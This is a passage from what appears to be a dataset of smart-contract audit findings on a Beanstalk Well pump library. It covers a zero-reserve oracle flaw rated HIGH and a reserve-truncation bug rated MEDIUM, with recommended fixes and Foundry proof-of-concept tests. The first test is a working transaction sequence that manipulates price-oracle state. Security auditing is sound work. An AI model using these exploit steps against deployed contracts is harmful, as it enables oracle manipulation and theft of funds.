if a reserve is 0.\\n b.lastReserves[i] =\\n _capReserve(b.lastReserves[i], (reserves[i] > 0 ? reserves[i] : 1).fromUIntToLog2(), blocksPassed);\\n b.emaReserves[i] = b.lastReserves[i].mul((ABDKMathQuad.ONE.sub(aN))).add(b.emaReserves[i].mul(aN));\\n b.cumulativeReserves[i] = b.cumulativeReserves[i].add(b.lastReserves[i].mul(deltaTimestampBytes));\\n }\\n```\\n",Revert the pump updates if they are called with zero reserve values.,"Updating pumps with zero reserve values can lead to the distortion of critical states likely to be utilized for price oracles. Given that the issue is exploitable through valid transactions, we assess the severity as HIGH. It is crucial to note that attackers can exploit this vulnerability to manipulate the price oracle.\\nProof of Concept: The test below shows that it is possible for reserves to be zero through valid transactions and updating pumps do not revert.\\n```\\nfunction testUpdateCalledWithZero() public {\\n address msgSender = 0x83a740c22a319FBEe5F2FaD0E8Cd0053dC711a1A;\\n changePrank(msgSender);\\n IERC20[] memory mockTokens = well.tokens();\\n\\n // add liquidity 1 on each side\\n uint amount = 1;\\n MockToken(address(mockTokens[0])).mint(msgSender, 1);\\n MockToken(address(mockTokens[1])).mint(msgSender, 1);\\n MockToken(address(mockTokens[0])).approve(address(well), amount);\\n MockToken(address(mockTokens[1])).approve(address(well), amount);\\n uint[] memory tokenAmountsIn = new uint[](2);\\n tokenAmountsIn[0] = amount;\\n tokenAmountsIn[1] = amount;\\n uint minLpAmountOut = well.getAddLiquidityOut(tokenAmountsIn);\\n well.addLiquidity(\\n tokenAmountsIn,\\n minLpAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n\\n // swaFromFeeOnTransfer from token1 to token0\\n msgSender = 0xfFfFFffFffffFFffFffFFFFFFfFFFfFfFFfFfFfD;\\n changePrank(msgSender);\\n amount = 79_228_162_514_264_337_593_543_950_334;\\n MockToken(address(mockTokens[1])).mint(msgSender, amount);\\n MockToken(address(mockTokens[1])).approve(address(well), amount);\\n uint minAmountOut = well.getSwapOut(\\n mockTokens[1],\\n mockTokens[0],\\n amount\\n );\\n\\n well.swapFromFeeOnTransfer(\\n mockTokens[1],\\n mockTokens[0],\\n amount,\\n minAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n increaseTime(120);\\n\\n // remove liquidity one token\\n msgSender = address(this);\\n changePrank(msgSender);\\n amount = 999_999_999_999_999_999_999_999_999;\\n uint minTokenAmountOut = well.getRemoveLiquidityOneTokenOut(\\n amount,\\n mockTokens[1]\\n );\\n well.removeLiquidityOneToken(\\n amount,\\n mockTokens[1],\\n minTokenAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n\\n msgSender = address(12_345_678);\\n changePrank(msgSender);\\n\\n vm.warp(block.timestamp + 1);\\n amount = 1;\\n MockToken(address(mockTokens[0])).mint(msgSender, amount);\\n MockToken(address(mockTokens[0])).approve(address(well), amount);\\n uint amountOut = well.getSwapOut(mockTokens[0], mockTokens[1], amount);\\n\\n uint[] memory reserves = well.getReserves();\\n assertEq(reserves[1], 0);\\n\\n // we are calling `_update` with reserves of 0, this should fail\\n well.swapFrom(\\n mockTokens[0],\\n mockTokens[1],\\n amount,\\n amountOut,\\n msgSender,\\n block.timestamp\\n );\\n}\\n```\\n","```\\n/**\\n * @title GeoEmaAndCumSmaPump\\n * @author Publius\\n * @notice Stores a geometric EMA and cumulative geometric SMA for each reserve.\\n * @dev A Pump designed for use in Beanstalk with 2 tokens.\\n *\\n * This Pump has 3 main features:\\n * 1. Multi-block MEV resistence reserves\\n * 2. MEV-resistant Geometric EMA intended for instantaneous reserve queries\\n * 3. MEV-resistant Cumulative Geometric intended for SMA reserve queries\\n *\\n * Note: If an `update` call is made with a reserve of 0, the Geometric mean oracles will be set to 0.\\n * Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0.\\n */\\n```\\n" +`LibLastReserveBytes::storeLastReserves` has no check for reserves being too large,medium,"After every liquidity event & swap, the IPump::update()is called. To update the pump, theLibLastReserveBytes::storeLastReservesfunction is used. This packs the reserve data intobytes32` slots in storage. A slot is then broken down into the following components:\\n1 byte for reserves array length\\n5 bytes for `timestamp`\\n16 bytes for each reserve balance\\nThis adds to 22 bytes total, but the function also attempts to pack the second reserve balance in the `bytes32` object. This would mean the `bytes32` would need 38 bytes total:\\n`1(length) + 5(timestamp) + 16(reserve balance 1) + 16(reserve balance 2) = 38 bytes`\\nTo fit all this data into the `bytes32`, the function cuts off the last few bytes of the reserve balances using shift, as shown below.\\n```\\nsrc\\libraries\\LibLastReserveBytes.sol\\n uint8 n = uint8(reserves.length);\\n if (n == 1) {\\n assembly {\\n sstore(slot, or(or(shl(208, lastTimestamp), shl(248, n)), shl(104, shr(152, mload(add(reserves, 32))))))\\n }\\n return;\\n }\\n assembly {\\n sstore(\\n slot,\\n or(\\n or(shl(208, lastTimestamp), shl(248, n)),\\n or(shl(104, shr(152, mload(add(reserves, 32)))), shr(152, mload(add(reserves, 64))))\\n )\\n )\\n // slot := add(slot, 32)\\n }\\n```\\n\\nSo if the amount being stored is too large, the actual stored value will be different than what was expected to be stored.\\nOn the other hand, the `LibBytes.sol` does seem to have a check:\\n```\\nrequire(reserves[0] <= type(uint128).max, ""ByteStorage: too large"");\\n```\\n\\nThe `_setReserves` function calls this library after every reserve update in the well. So in practice, with the currently implemented wells & pumps, this check would cause a revert.\\nHowever, a well that is implemented without this check could additionally trigger the pumps to cut off reserve data, meaning prices would be incorrect.","We recommend adding a check on the size of reserves in `LibLastReseveBytes`.\\nAdditionally, it is recommended to add comments to `LibLastReseveBytes` to inform users about the invariants of the system and how the max size of reserves should be equal to the max size of a `bytes16` and not a `uint256`.","While we assume users will be explicitly warned about malicious Wells and are unlikely to interact with invalid Wells, we assess the severity to be MEDIUM.\\nProof of Concept:\\n```\\nfunction testStoreAndReadTwo() public {\\n uint40 lastTimeStamp = 12345363;\\n bytes16[] memory reserves = new bytes16[](2);\\n reserves[0] = 0xffffffffffffffffffffffffffffffff; // This is too big!\\n reserves[1] = 0x11111111111111111111111100000000;\\n RESERVES_STORAGE_SLOT.storeLastReserves(lastTimeStamp, reserves);\\n (\\n uint8 n,\\n uint40 _lastTimeStamp,\\n bytes16[] memory _reserves\\n ) = RESERVES_STORAGE_SLOT.readLastReserves();\\n assertEq(2, n);\\n assertEq(lastTimeStamp, _lastTimeStamp);\\n assertEq(reserves[0], _reserves[0]); // This will fail\\n assertEq(reserves[1], _reserves[1]);\\n assertEq(reserves.length, _reserves.length);\\n}\\n```\\n","```\\nsrc\\libraries\\LibLastReserveBytes.sol\\n uint8 n = uint8(reserves.length);\\n if (n == 1) {\\n assembly {\\n sstore(slot, or(or(shl(208, lastTimestamp), shl(248, n)), shl(104, shr(152, mload(add(reserves, 32))))))\\n }\\n return;\\n }\\n assembly {\\n sstore(\\n slot,\\n or(\\n or(shl(208, lastTimestamp), shl(248, n)),\\n or(shl(104, shr(152, mload(add(reserves, 32)))), shr(152, mload(add(reserves, 64))))\\n )\\n )\\n // slot := add(slot, 32)\\n }\\n```\\n"